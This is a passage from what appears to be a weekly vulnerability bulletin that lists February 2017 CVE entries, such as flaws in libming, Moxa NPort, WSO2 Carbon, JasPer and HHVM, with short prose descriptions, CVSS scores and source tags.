CONFIRM
CONFIRM
libming — libming The _iprintf function in outputtxt.c in the listswf tool in libming 0.4.7 allows remote attackers to cause a denial of service (buffer over-read) via a crafted SWF file. 2017-02-16 4.3 CVE-2016-9827
MLIST
MLIST
BID
MISC
libming — libming The dumpBuffer function in read.c in the listswf tool in libming 0.4.7 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted SWF file. 2017-02-16 4.3 CVE-2016-9828
MLIST
MLIST
BID
MISC
libming — libming Heap-based buffer overflow in the parseSWF_DEFINEFONT function in parser.c in the listswf tool in libming 0.4.7 allows remote attackers to have unspecified impact via a crafted SWF file. 2017-02-16 6.8 CVE-2016-9829
MLIST
MLIST
BID
MISC
libming — libming Heap-based buffer overflow in the parseSWF_RGBA function in parser.c in the listswf tool in libming 0.4.7 allows remote attackers to have unspecified impact via a crafted SWF file. 2017-02-16 6.8 CVE-2016-9831
MLIST
MLIST
BID
MISC
linux — linux_kernel The ipv4_pktinfo_prepare function in net/ipv4/ip_sockglue.c in the Linux kernel through 4.9.9 allows attackers to cause a denial of service (system crash) via (1) an application that makes crafted system calls or possibly (2) IPv4 traffic with invalid IP options. 2017-02-14 5.0 CVE-2017-5970
CONFIRM
MLIST
CONFIRM
CONFIRM
CONFIRM
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. A user with read-only access can send commands to the software and the application will accept those commands. This would allow an attacker with read-only access to make changes within the application. 2017-02-13 5.5 CVE-2016-8357
BID
MISC
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application does not sufficiently verify if a request was intentionally provided by the user who submitted the request (CROSS-SITE REQUEST FORGERY). 2017-02-13 6.8 CVE-2016-8369
BID
MISC
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application’s database lacks sufficient safeguards for protecting credentials. 2017-02-13 5.0 CVE-2016-8378
BID
MISC
mariadb — mariadb Crash in libmysqlclient.so in Oracle MySQL before 5.6.21 and 5.7.x before 5.7.5 and MariaDB through 5.5.54, 10.0.x through 10.0.29, 10.1.x through 10.1.21, and 10.2.x through 10.2.3. 2017-02-11 5.0 CVE-2017-3302
MISC
moxa — dacenter An issue was discovered in Moxa DACenter Versions 1.4 and older. The application may suffer from an unquoted search path issue. 2017-02-13 4.6 CVE-2016-9356
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Requests are not verified to be intentionally submitted by the proper user (CROSS-SITE REQUEST FORGERY). 2017-02-13 6.8 CVE-2016-9365
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. An attacker can freely use brute force to determine parameters needed to bypass authentication. 2017-02-13 5.0 CVE-2016-9366
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. User-controlled input is not neutralized before being output to web page (CROSS-SITE SCRIPTING). 2017-02-13 4.3 CVE-2016-9371
BID
MISC
moxa — softcms An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. A specially crafted URL request sent to the SoftCMS ASP Webserver can cause a double free condition on the server allowing an attacker to modify memory locations and possibly cause a denial of service or the execution of arbitrary code. 2017-02-13 6.8 CVE-2016-8360
BID
MISC
moxa — softcms An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. The SoftCMS Application does not properly sanitize input that may allow a remote attacker access to SoftCMS with administrator’s privilege through specially crafted input (SQL INJECTION). 2017-02-13 6.5 CVE-2016-9333
BID
MISC
nitro_software — nitro_pro A remote out of bound write / memory corruption vulnerability exists in the PDF parsing functionality of Nitro Pro 10. A specially crafted PDF file can cause a vulnerability resulting in potential memory corruption. An attacker can send the victim a specific PDF file to trigger this vulnerability. 2017-02-10 6.8 CVE-2016-8709
MISC
nitro_software — nitro_pro A potential remote code execution vulnerability exists in the PDF parsing functionality of Nitro Pro 10. A specially crafted PDF file can cause a vulnerability resulting in potential code execution. An attacker can send the victim a specific PDF file to trigger this vulnerability. 2017-02-10 6.8 CVE-2016-8711
MISC
omnimetrix — omniview An issue was discovered in OmniMetrix OmniView, Version 1.2. The OmniView web application transmits credentials with the HTTP protocol, which could be sniffed by an attacker that may result in the compromise of account credentials. 2017-02-13 5.0 CVE-2016-5786
BID
MISC
omnimetrix — omniview An issue was discovered in OmniMetrix OmniView, Version 1.2. Insufficient password requirements for the OmniView web application may allow an attacker to gain access by brute forcing account passwords. 2017-02-13 5.0 CVE-2016-5801
BID
MISC
opensuse_project — leap Stack-based buffer overflow in the safe_fprintf function in tar/util.c in libarchive 3.2.1 allows remote attackers to cause a denial of service via a crafted non-printable multibyte character in a filename. 2017-02-15 5.0 CVE-2016-8687
SUSE
MLIST
BID
MISC
CONFIRM
MISC
GENTOO
opensuse_project — leap The mtree bidder in libarchive 3.2.1 does not keep track of line sizes when extending the read-ahead, which allows remote attackers to cause a denial of service (crash) via a crafted file, which triggers an invalid read in the (1) detect_form or (2) bid_entry function in libarchive/archive_read_support_format_mtree.c. 2017-02-15 4.3 CVE-2016-8688
SUSE
MLIST
BID
MISC
MISC
MISC
MISC
MISC
CONFIRM
CONFIRM
GENTOO
opensuse_project — leap The read_Header function in archive_read_support_format_7zip.c in libarchive 3.2.1 allows remote attackers to cause a denial of service (out-of-bounds read) via multiple EmptyStream attributes in a header in a 7zip archive. 2017-02-15 5.0 CVE-2016-8689
SUSE
MLIST
BID
MISC
CONFIRM
CONFIRM
GENTOO
otrs — otrs Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.3.x before 3.3.16, 4.0.x before 4.0.19, and 5.0.x before 5.0.14 allows remote attackers to inject arbitrary web script or HTML via a crafted attachment. 2017-02-16 4.3 CVE-2016-9139
BID
CONFIRM
python — openpyxl Openpyxl 2.4.1 resolves external entities by default, which allows remote attackers to conduct XXE attacks via a crafted .xlsx document. 2017-02-15 5.8 CVE-2017-5992
CONFIRM
CONFIRM
CONFIRM
CONFIRM
samsung — samsung_mobile Samsung devices with Android KK(4.4), L(5.0/5.1), or M(6.0) allow attackers to cause a denial of service (system crash) via a crafted system call to TvoutService_C. 2017-02-13 5.0 CVE-2016-4547
CONFIRM
MLIST
schneider_electric — homelynk_controller_lss100100_firmware An issue was discovered in Schneider Electric homeLYnk Controller, LSS100100, all versions prior to V1.5.0. The homeLYnk controller is susceptible to a cross-site scripting attack. User inputs can be manipulated to cause execution of JavaScript code. 2017-02-13 4.3 CVE-2017-5157
BID
MISC
visonic — powerlink2_firmware An issue was discovered in Visonic PowerLink2, all versions prior to October 2016 firmware release. User controlled input is not neutralized prior to being placed in web page output (CROSS-SITE SCRIPTING). 2017-02-13 4.3 CVE-2016-5811
BID
MISC
wordpress — mail_plugin An issue was discovered in the WP Mail plugin before 1.2 for WordPress. The replyto parameter when composing a mail allows for a reflected XSS. This would allow you to execute JavaScript in the context of the user receiving the mail. 2017-02-10 4.3 CVE-2017-5942
MISC
wso2 — carbon Directory traversal vulnerability in the LogViewer Admin Service in WSO2 Carbon 4.4.5 allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the logFile parameter to downloadgz-ajaxprocessor.jsp. 2017-02-16 4.0 CVE-2016-4314
MISC
MISC
BUGTRAQ
BID
CONFIRM
EXPLOIT-DB
wso2 — carbon Multiple cross-site scripting (XSS) vulnerabilities in WSO2 Carbon 4.4.5 allow remote attackers to inject arbitrary web script or HTML via the (1) setName parameter to identity-mgt/challenges-mgt.jsp; the (2) webappType or (3) httpPort parameter to webapp-list/webapp_info.jsp; the (4) dsName or (5) description parameter to ndatasource/newdatasource.jsp; the (6) phase parameter to viewflows/handlers.jsp; or the (7) url parameter to ndatasource/validateconnection-ajaxprocessor.jsp. 2017-02-16 4.3 CVE-2016-4316
MISC
MISC
BUGTRAQ
BID
EXPLOIT-DB
wso2 — enablement_server_for_java Cross-site scripting (XSS) vulnerability in WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. 2017-02-16 4.3 CVE-2016-4327
MISC
BUGTRAQ
BID

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bigtreecms — bigtree_cms An issue was discovered in BigTree CMS before 4.2.15. The vulnerability exists due to insufficient filtration of user-supplied data in the "id" HTTP GET parameter passed to the "core/admin/adjax/dashboard/check-module-integrity.php" URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. 2017-02-14 3.5 CVE-2016-10223
CONFIRM
CONFIRM
ibm — rational_collaborative_lifecycle_management IBM Jazz Foundation is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1998515. 2017-02-15 3.5 CVE-2016-8968
CONFIRM
ibm — websphere_application_server IBM WebSphere Application Server 7.0, 8.0, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1997743 2017-02-13 3.5 CVE-2017-1121
CONFIRM
linux — linux_kernel The time subsystem in the Linux kernel through 4.9.9, when CONFIG_TIMER_STATS is enabled, allows local users to discover real PID values (as distinguished from PID values inside a PID namespace) by reading the /proc/timer_list file, related to the print_timer function in kernel/time/timer_list.c and the __timer_stats_timer_set_start_info function in kernel/time/timer.c. 2017-02-14 2.1 CVE-2017-5967
CONFIRM
MISC
mcafee — epolicy_orchestrator Cross-site scripting (XSS) vulnerability in the Web user interface (UI) in Intel Security ePO 5.1.3, 5.1.2, 5.1.1, and 5.1.0 allows authenticated users to inject malicious Java scripts via bypassing input validation. 2017-02-13 3.5 CVE-2017-3902
CONFIRM
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. A configuration file contains parameters that represent passwords in plaintext. 2017-02-13 2.1 CVE-2016-9348
BID
MISC
samsung — samsung_mobile Samsung devices with Android KK(4.4) or L(5.0/5.1) allow local users to cause a denial of service (IAndroidShm service crash) via crafted data in a service call. 2017-02-13 2.1 CVE-2016-4546
CONFIRM
MLIST
wso2 — carbon Cross-site request forgery (CSRF) vulnerability in WSO2 Carbon 4.4.5 allows remote attackers to hijack the authentication of privileged users for requests that shutdown a server via a shutdown action to server-admin/proxy_ajaxprocessor.jsp. 2017-02-16 3.5 CVE-2016-4315
MISC
MISC
BUGTRAQ
BID
CONFIRM
EXPLOIT-DB

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apache_software_foundation — apache_tomcat
 
It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu. 2017-02-17 not yet calculated CVE-2017-6056
CONFIRM
CONFIRM
CONFIRM
CONFIRM
artifex_software — mupdf
 
An issue was discovered in Artifex Software, Inc. MuPDF before 1912de5f08e90af1d9d0a9791f58ba3afdb9d465. The pdf_run_xobject function in pdf-op-run.c encounters a NULL pointer dereference during a Fitz fz_paint_pixmap_with_mask painting operation. 2017-02-15 not yet calculated CVE-2017-5991
CONFIRM
CONFIRM
bd — alaris
 
An issue was discovered in Becton, Dickinson and Company (BD) Alaris 8015 Point of Care (PC) unit, Version 9.5 and prior versions, and Version 9.7, and 8000 PC unit. An unauthorized user with physical access to an affected Alaris PC unit may be able to obtain unencrypted wireless network authentication credentials and other sensitive technical data by disassembling the PC unit and accessing the device’s flash memory. The Alaris 8015 PC unit, Version 9.7, and the 8000 PC unit store wireless network authentication credentials and other sensitive technical data on internal flash memory. Accessing the internal flash memory of the affected device would require special tools to extract data and carrying out this attack at a healthcare facility would increase the likelihood of detection. 2017-02-13 not yet calculated CVE-2016-8375
BID
MISC
MISC
bd — alaris
 
An issue was discovered in Becton, Dickinson and Company (BD) Alaris 8015 Point of Care (PC) unit, Version 9.5 and prior versions, and Version 9.7. An unauthorized user with physical access to an Alaris 8015 PC unit may be able to obtain unencrypted wireless network authentication credentials and other sensitive technical data by disassembling an Alaris 8015 PC unit and accessing the device’s flash memory. Older software versions of the Alaris 8015 PC unit, Version 9.5 and prior versions, store wireless network authentication credentials and other sensitive technical data on the affected device’s removable flash memory. Being able to remove the flash memory from the affected device reduces the risk of detection, allowing an attacker to extract stored data at the attacker’s convenience. 2017-02-13 not yet calculated CVE-2016-9355
BID
MISC
ca_technologies — infrastructure_management
 
An issue was discovered in CA Unified Infrastructure Management Version 8.47 and earlier. The Unified Infrastructure Management software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. 2017-02-13 not yet calculated CVE-2016-5803
BID
MISC
carlo_gavazzi — vmu-c_em
 
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. The access control flaw allows access to most application functions without authentication. 2017-02-13 not yet calculated CVE-2017-5144
BID
MISC
carlo_gavazzi — vmu-c_em
 
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Sensitive information is stored in clear-text. 2017-02-13 not yet calculated CVE-2017-5146
BID
MISC
carlo_gavazzi — vmu-c_em
 
An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Successful exploitation of this CROSS-SITE REQUEST FORGERY (CSRF) vulnerability can allow execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 2017-02-13 not yet calculated CVE-2017-5145
BID
MISC
cisco — cisco_ucs
 
A vulnerability in the web-based GUI of Cisco UCS Director 6.0.0.0 and 6.0.0.1 could allow an authenticated, local attacker to execute arbitrary workflow items with just an end-user profile, a Privilege Escalation Vulnerability. The vulnerability is due to improper role-based access control (RBAC) after the Developer Menu is enabled in Cisco UCS Director. An attacker could exploit this vulnerability by enabling Developer Mode for his/her user profile with an end-user profile and then adding new catalogs with arbitrary workflow items to his/her profile. An exploit could allow an attacker to perform any actions defined by these workflow items, including actions affecting other tenants. Cisco Bug IDs: CSCvb64765. 2017-02-15 not yet calculated CVE-2017-3801
CONFIRM
cisco — jasper
 
The jpc_dec_process_siz function in libjasper/jpc/jpc_dec.c in JasPer before 1.900.4 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted YRsiz value in a BMP image to the imginfo command. 2017-02-15 not yet calculated CVE-2016-8692
DEBIAN
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
cisco — jasper
 
Stack-based buffer overflow in the jpc_tsfb_getbands2 function in jpc_tsfb.c in JasPer before 1.900.30 allows remote attackers to have unspecified impact via a crafted image. 2017-02-15 not yet calculated CVE-2016-9560
MLIST
MLIST
BID
MISC
CONFIRM
cisco — jasper
 
Double free vulnerability in the mem_close function in jas_stream.c in JasPer before 1.900.10 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted BMP image to the imginfo command. 2017-02-15 not yet calculated CVE-2016-8693
SUSE
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
cisco — jasper
 
The jpc_dec_process_siz function in libjasper/jpc/jpc_dec.c in JasPer before 1.900.4 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted XRsiz value in a BMP image to the imginfo command. 2017-02-15 not yet calculated CVE-2016-8691
DEBIAN
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
cisco — jasper
 
The bmp_getdata function in libjasper/bmp/bmp_dec.c in JasPer before 1.900.5 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted BMP image in an imginfo command. 2017-02-15 not yet calculated CVE-2016-8690
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
crypto++ — crypto++
 
The timing attack protection in Rijndael::Enc::ProcessAndXorBlock and Rijndael::Dec::ProcessAndXorBlock in Crypto++ (aka cryptopp) before 5.6.4 may be optimized out by the compiler, which allows attackers to conduct timing attacks. 2017-02-13 not yet calculated CVE-2016-3995
MLIST
BID
CONFIRM
delta_electronics — delta-electronics
 
An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to 2.10.10. Multiple instances of out-of-bounds write conditions may allow malicious files to be read and executed by the affected software. 2017-02-13 not yet calculated CVE-2016-5802
BID
MISC
delta_electronics — delta-electronics
 
An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. 2017-02-13 not yet calculated CVE-2016-5805
BID
MISC
dovecot — dovecot
 
The auth component in Dovecot before 2.2.27, when auth-policy is configured, allows a remote attackers to cause a denial of service (crash) by aborting authentication without setting a username. 2017-02-16 not yet calculated CVE-2016-8652
MLIST
MLIST
MLIST
BID
eaton — epdu
 
An issue was discovered in certain legacy Eaton ePDUs — the affected products are past end-of-life (EoL) and no longer supported: EAMxxx prior to June 30, 2015, EMAxxx prior to January 31, 2014, EAMAxx prior to January 31, 2014, EMAAxx prior to January 31, 2014, and ESWAxx prior to January 31, 2014. An unauthenticated attacker may be able to access configuration files with a specially crafted URL (Path Traversal). 2017-02-13 not yet calculated CVE-2016-9357
BID
MISC
ecommerce_shopsoftware — ecommerce_shopsoftware
 
Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote attackers to execute arbitrary SQL commands via the (1) orders_status or (2) customers_status parameter to api/easybill/easybillcsv.php. 2017-02-15 not yet calculated CVE-2016-3694
MISC
EXPLOIT-DB
emerson — deltav
 
An issue was discovered in Emerson DeltaV Easy Security Management DeltaV V12.3, DeltaV V12.3.1, and DeltaV V13.3. Critical vulnerabilities may allow a local attacker to elevate privileges within the DeltaV control system. 2017-02-13 not yet calculated CVE-2016-9345
BID
MISC
emerson — emerson
 
An issue was discovered in Emerson SE4801T0X Redundant Wireless I/O Card V13.3, and SE4801T1X Simplex Wireless I/O Card V13.3. DeltaV Wireless I/O Cards (WIOC) running the firmware available in the DeltaV system, release v13.3, have the SSH (Secure Shell) functionality enabled unnecessarily. 2017-02-13 not yet calculated CVE-2016-9347
BID
MISC
emerson — liebert_sitescan
 
An XML External Entity (XXE) issue was discovered in Emerson Liebert SiteScan Web Version 6.5, and prior. An attacker may enter malicious input to Liebert SiteScan through a weakly configured XML parser causing the application to execute arbitrary code or disclose file contents from a server or connected network. 2017-02-13 not yet calculated CVE-2016-8348
BID
MISC
eparaksts — eparaksts
 
XML external entity (XXE) vulnerability in eParakstitajs 3 before 1.3.9 and eParaksts Java lib before 2.5.13 allows remote attackers to read arbitrary files or possibly have unspecified other impact via a crafted edoc file. 2017-02-17 not yet calculated CVE-2017-6055
MISC
MISC
facebook — hhmv
 
Self recursion in compact in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6873
MLIST
MLIST
CONFIRM
facebook — hhmv
 
Integer overflow in bcmath in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors, which triggers a buffer overflow. 2017-02-17 not yet calculated CVE-2016-6871
MLIST
MLIST
CONFIRM
facebook — hhmv
 
The array_*_recursive functions in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors, related to recursion. 2017-02-17 not yet calculated CVE-2016-6874
MLIST
MLIST
CONFIRM
facebook — hhmv
 
Infinite recursion in wddx in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6875
MLIST
MLIST
CONFIRM
facebook — hhmv
 
Out-of-bounds write in the (1) mb_detect_encoding, (2) mb_send_mail, and (3) mb_detect_order functions in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6870
MLIST
MLIST
CONFIRM
facebook — hhmv
 
Integer overflow in StringUtil::implode in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6872
MLIST
MLIST
CONFIRM
fatek — winproloader
 
An issue was discovered in Fatek Automation PLC WinProladder Version 3.11 Build 14701. A stack-based buffer overflow vulnerability exists when the software application connects to a malicious server, resulting in a stack buffer overflow. This causes an exploitable Structured Exception Handler (SEH) overwrite condition that may allow remote code execution. 2017-02-13 not yet calculated CVE-2016-8377
BID
MISC
fidelix — fidelix_fx-20
 
An issue was discovered in Fidelix FX-20 series controllers, versions prior to 11.50.19. Arbitrary file reading via path traversal allows an attacker to access arbitrary files and directories on the server. 2017-02-13 not yet calculated CVE-2016-9364
BID
MISC
fortinet — fortimanager
 
An improper certificate validation vulnerability in Fortinet FortiManager 5.0.6 through 5.2.7 and 5.4.0 through 5.4.1 allows remote attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack via the Fortisandbox devices probing feature. 2017-02-13 not yet calculated CVE-2016-8495
CONFIRM
froxlor — froxlor
 
Froxlor before 0.9.35 uses the PHP rand function for random number generation, which makes it easier for remote attackers to guess the password reset token by predicting a value. 2017-02-13 not yet calculated CVE-2016-5100
CONFIRM
ge — proficy_hmi/scada
 
An issue was discovered in General Electric (GE) Proficy HMI/SCADA iFIX Version 5.8 SIM 13 and prior versions, Proficy HMI/SCADA CIMPLICITY Version 9.0 and prior versions, and Proficy Historian Version 6.0 and prior versions. An attacker may be able to retrieve user passwords if he or she has access to an authenticated session. 2017-02-13 not yet calculated CVE-2016-9360
BID
MISC
genixcms — genixcms
 
SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS through 1.0.2 allows remote authenticated users to execute arbitrary SQL commands via the order parameter. 2017-02-17 not yet calculated CVE-2017-6065
MISC
google — chrome
 
FFmpeg in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, failed to perform proper bounds checking, which allowed a remote attacker to potentially exploit heap corruption via a crafted video file. 2017-02-17 not yet calculated CVE-2017-5024
BID
CONFIRM
CONFIRM
google — chrome
 
Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, had an insufficiently strict content security policy on the Chrome app launcher page, which allowed a remote attacker to inject scripts or HTML into a privileged page via a crafted HTML page. 2017-02-17 not yet calculated CVE-2017-5018
BID
CONFIRM
CONFIRM
google — chrome
 
Interactions with the OS in Google Chrome prior to 56.0.2924.76 for Mac insufficiently cleared video memory, which allowed a remote attacker to possibly extract image fragments on systems with GeForce 8600M graphics chips via a crafted HTML page. 2017-02-17 not yet calculated CVE-2017-5017
BID
CONFIRM
CONFIRM
google — chrome
 
A use after free in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. 2017-02-17 not yet calculated CVE-2017-5021
BID
CONFIRM
CONFIRM
gosa — gosa
 
The generate_smb_nt_hash function in include/functions.inc in GOsa allows remote attackers to execute arbitrary commands via a crafted password. 2017-02-13 not yet calculated CVE-2015-8771
MLIST
CONFIRM
graphicsmagick — graphicsmagick

 

The AcquireMagickMemory function in MagickCore/memory.c in GraphicsMagick before 7.0.3.3 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure. 2017-02-15 not yet calculated CVE-2016-8862
DEBIAN
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
graphicsmagick — graphicsmagick
 
The AcquireMagickMemory function in MagickCore/memory.c in GraphicsMagick 7.0.3.3 before 7.0.3.8 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-8862. 2017-02-15 not yet calculated CVE-2016-8866
SUSE
SUSE
SUSE
MLIST
MLIST
MISC
CONFIRM
CONFIRM
hanwha_techwin — smart_security_manager
 
An issue was discovered in Hanwha Techwin Smart Security Manager Versions 1.5 and prior. Multiple Cross Site Request Forgery vulnerabilities have been identified. The flaws exist within the Redis and Apache Felix Gogo servers that are installed as part of this product. By issuing specific HTTP Post requests, an attacker can gain system level access to a remote shell session. Smart Security Manager Versions 1.5 and prior are affected by these vulnerabilities. These vulnerabilities can allow for remote code execution. 2017-02-13 not yet calculated CVE-2017-5169
MISC
hanwha_techwin — smart_security_manager
 
An issue was discovered in Hanwha Techwin Smart Security Manager Versions 1.5 and prior. Multiple Path Traversal vulnerabilities have been identified. The flaws exist within the ActiveMQ Broker service that is installed as part of the product. By issuing specific HTTP requests, if a user visits a malicious page, an attacker can gain access to arbitrary files on the server. Smart Security Manager Versions 1.4 and prior to 1.31 are affected by these vulnerabilities. These vulnerabilities can allow for remote code execution. 2017-02-13 not yet calculated CVE-2017-5168
MISC
hirschmann — geko_lite_managed_switch
 
An issue was discovered in Belden Hirschmann GECKO Lite Managed switch, Version 2.0.00 and prior versions. After an administrator downloads a configuration file, a copy of the configuration file, which includes hashes of user passwords, is saved to a location that is accessible without authentication by path traversal. 2017-02-13 not yet calculated CVE-2017-5163
BID
MISC
honeywell — experion_pks_platform
 
An issue was discovered in Honeywell Experion Process Knowledge System (PKS) platform: Experion PKS, Release 3xx and prior, Experion PKS, Release 400, Experion PKS, Release 410, Experion PKS, Release 430, and Experion PKS, Release 431. Experion PKS does not properly validate input. By sending a specially crafted packet, an attacker could cause the process to terminate. A successful exploit would prevent firmware uploads to the Series-C devices. 2017-02-13 not yet calculated CVE-2016-8344
BID
MISC
ibhsoftec — softplc
 
An issue was discovered in IBHsoftec S7-SoftPLC prior to 4.12b. Object memory can read a network packet that is larger than the space that is available, a Heap-based Buffer Overflow. 2017-02-13 not yet calculated CVE-2016-8364
BID
MISC
ibm — resilient
 
IBM Resilient v26.0, v26.1, and v26.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference#: 213457065. 2017-02-16 not yet calculated CVE-2016-6062
BID
CONFIRM
ibm — security_access_manager
 
IBM Security Access Manager for Web 7.0.0, 8.0.0, and 9.0.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM Reference #: 1996868. 2017-02-16 not yet calculated CVE-2016-5919
CONFIRM
ibm — tivoli
 
IBM Tivoli Storage Manager for Virtual Environments 7.1 (VMware) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM Reference #: 1995545. 2017-02-15 not yet calculated CVE-2016-6033
CONFIRM
BID
ibm — websphere
 
IBM Websphere MQ JMS 7.0.1, 7.1, 7.5, 8.0, and 9.0 client provides classes that deserialize objects from untrusted sources which could allow a malicious user to execute arbitrary Java code by adding vulnerable classes to the classpath. IBM Reference #: 1983457. 2017-02-15 not yet calculated CVE-2016-0360
CONFIRM
BID
icoutils — icoutils
 
An issue was discovered in icoutils 0.31.1. A buffer overflow was observed in the "decode_ne_resource_id" function in the "restable.c" source file. This is happening because the "len" parameter for memcpy is not checked for size and thus becomes a negative integer in the process, resulting in a failed memcpy. This affects wrestool. 2017-02-16 not yet calculated CVE-2017-6009
MISC
icoutils — icoutils
 
